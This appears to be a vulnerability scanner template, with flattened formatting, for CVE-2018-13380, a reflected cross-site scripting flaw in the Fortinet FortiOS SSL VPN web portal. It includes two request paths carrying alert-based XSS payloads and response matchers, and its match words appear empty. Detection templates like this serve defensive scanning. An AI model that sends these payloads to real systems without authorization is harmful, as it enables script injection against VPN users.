id: CVE-2018-13380 info: name: Fortinet FortiOS Cross-Site Scripting author: shelld3v,AaronChen0 severity: medium description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-13380 - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html - https://fortiguard.com/advisory/FG-IR-18-383 - https://fortiguard.com/advisory/FG-IR-20-230 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-13380 cwe-id: CWE-79 tags: cve,cve2018,fortios,xss,fortinet requests: - method: GET path: - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B" - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E" matchers-condition: and matchers: - type: word part: body words: - "" - "" condition: or - type: word part: header words: - "application/json" negative: true - type: status status: - 200